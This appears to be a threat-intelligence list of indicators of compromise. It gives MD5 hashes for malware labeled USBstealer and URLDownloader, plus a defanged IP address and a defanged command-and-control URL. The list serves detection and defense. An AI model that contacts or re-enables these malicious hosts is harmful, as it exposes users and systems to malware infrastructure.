d938a75d93c20790b1f2b5d5b7294895
29eb61f04b905e2133e9afdd12482073
9bdfc0d5c45f1ce1200419ec6eec15f4
8a991eec65bd90f12450ee9dac0f286a

USBstealer
c3d65d73cd6894fdad3fc281b976fd8b
e9b1a3aa2de67300356b6587a8034b0b
cf5e472613921dc330008c79870b23ab
bf2eb6c19778a35f812ddc86d616c837
1e5c2029dafdd50dce2effd5154b6879
b785db2b3801d5190dad9e6f03d48999
3f84ddc0d9ec7b08477a76b75b4421b8
c0ceba3a708082c372c077aa9420d09e
d11ebec8f1d42dd139b18639f7f9534a -> 5.189.167[.]220

URLDownloader Module Sample
532013750ee3caac93a9972103761233

URLDownloader C&C
hxxp://sahirlodhi[.]com/usr/api.txt